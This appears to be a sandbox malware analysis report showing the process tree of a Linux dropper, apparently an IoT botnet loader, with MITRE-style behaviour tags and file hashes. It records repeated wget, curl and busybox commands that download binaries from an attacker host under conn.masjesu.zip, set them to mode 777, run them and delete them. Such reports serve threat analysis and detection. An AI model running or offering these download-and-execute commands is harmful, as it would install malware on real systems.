/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:956
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:973
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1001
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97